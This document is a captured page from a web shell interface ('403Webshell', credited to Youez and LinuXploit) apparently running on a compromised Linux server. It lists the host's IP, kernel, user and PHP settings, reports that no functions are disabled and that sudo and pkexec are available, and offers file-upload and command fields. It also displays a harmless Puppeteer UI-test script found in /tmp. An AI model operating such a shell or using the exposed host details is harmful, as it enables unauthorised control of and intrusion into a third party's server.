403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/smi-shot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/smi-shot/cbx.js
const puppeteer=require('puppeteer');
(async()=>{
const b=await puppeteer.launch({headless:'new',args:['--no-sandbox','--disable-setuid-sandbox','--host-resolver-rules=MAP www.safemyident.de 127.0.0.1','--ignore-certificate-errors']});
const p=await b.newPage();
await p.goto('https://www.safemyident.de/tools/ip-check/',{waitUntil:'networkidle2',timeout:60000});
const before=await p.evaluate(()=>{
  const inp=document.getElementById('smi-ipc-fp'), box=document.querySelector('.smi-ipc__fpopt-box');
  const ci=getComputedStyle(inp), cb=getComputedStyle(box);
  return {inp:{w:ci.width,h:ci.height,opacity:ci.opacity,position:ci.position,appearance:ci.appearance},
    box:{w:cb.width,h:cb.height,bg:cb.backgroundColor,display:cb.display}};
});
await p.evaluate(()=>document.getElementById('smi-ipc-fp').click());
await new Promise(r=>setTimeout(r,150));
const after=await p.evaluate(()=>{
  const inp=document.getElementById('smi-ipc-fp'), box=document.querySelector('.smi-ipc__fpopt-box');
  return {checked:inp.checked, boxBg:getComputedStyle(box).backgroundColor, afterScale:getComputedStyle(box,'::after').transform};
});
console.log('BEFORE:',JSON.stringify(before));
console.log('AFTER click:',JSON.stringify(after));
await b.close();
})().catch(e=>{console.error('ERR',e.message);process.exit(1);});

Youez - 2016 - github.com/yon3zu
LinuXploit